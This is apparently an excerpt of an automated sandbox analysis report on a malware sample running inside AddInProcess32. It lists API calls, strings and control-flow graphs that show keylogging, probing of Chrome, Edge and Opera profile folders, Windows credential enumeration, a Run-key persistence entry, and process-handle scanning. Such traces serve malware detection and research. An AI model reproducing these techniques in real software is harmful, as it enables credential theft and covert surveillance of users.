                                            • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LocaleValid
                                            • String ID: IsValidLocaleName$kKD
                                            • API String ID: 1901932003-3269126172
                                            • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                            • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                            • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                            • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                            APIs
                                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                            • API String ID: 1174141254-4188645398
                                            • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                            • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                            • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                            • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                            APIs
                                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                            • API String ID: 1174141254-2800177040
                                            • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                            • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                            • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                            • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                            APIs
                                            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: AppData$\Opera Software\Opera Stable\
                                            • API String ID: 1174141254-1629609700
                                            • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                            • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                            • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                            • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                            APIs
                                            • GetKeyState.USER32(00000011), ref: 0040B686
                                              • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                              • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                              • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                              • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                              • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                              • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                              • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                            • String ID: [AltL]$[AltR]
                                            • API String ID: 2738857842-2658077756
                                            • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                            • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                            • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                            • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileSystem
                                            • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                            • API String ID: 2086374402-949981407
                                            • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                            • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                            • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                            • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID: !D@$open
                                            • API String ID: 587946157-1586967515
                                            • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                            • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                            • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                            • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                            APIs
                                            • ___initconout.LIBCMT ref: 004555DB
                                              • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                            • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleCreateFileWrite___initconout
                                            • String ID: PkGNG
                                            • API String ID: 3087715906-263838557
                                            • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                            • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                            • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                            • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                            APIs
                                            • GetKeyState.USER32(00000012), ref: 0040B6E0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: State
                                            • String ID: [CtrlL]$[CtrlR]
                                            • API String ID: 1649606143-2446555240
                                            • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                            • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                            • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                            • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                            APIs
                                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                            • __Init_thread_footer.LIBCMT ref: 00410F64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer__onexit
                                            • String ID: ,kG$0kG
                                            • API String ID: 1881088180-2015055088
                                            • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                            • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                            • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                            • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                            • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteOpenValue
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                            • API String ID: 2654517830-1051519024
                                            • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                            • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                            • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                            • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                            • GetLastError.KERNEL32 ref: 00440D85
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 1717984340-0
                                            • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                            • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                            • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                            • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                            APIs
                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                            • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastRead
                                            • String ID:
                                            • API String ID: 4100373531-0
                                            • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                            • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                            • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                            • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                            APIs
                                            • memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                            • memset.MSVCRT ref: 0040DF5F
                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                            • API String ID: 708747863-3398334509
                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                            APIs
                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                            • free.MSVCRT ref: 00418803
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                            • String ID:
                                            • API String ID: 1355100292-0
                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID:
                                            • API String ID: 1690352074-0
                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                            APIs
                                            • memset.MSVCRT ref: 0041898C
                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: InfoSystemmemset
                                            • String ID:
                                            • API String ID: 3558857096-0
                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                            APIs
                                            • memset.MSVCRT ref: 004455C2
                                            • wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 0044570D
                                            • memset.MSVCRT ref: 00445725
                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                            • memset.MSVCRT ref: 0044573D
                                            • memset.MSVCRT ref: 00445755
                                            • memset.MSVCRT ref: 004458CB
                                            • memset.MSVCRT ref: 004458E3
                                            • memset.MSVCRT ref: 0044596E
                                            • memset.MSVCRT ref: 00445A10
                                            • memset.MSVCRT ref: 00445A28
                                            • memset.MSVCRT ref: 00445AC6
                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
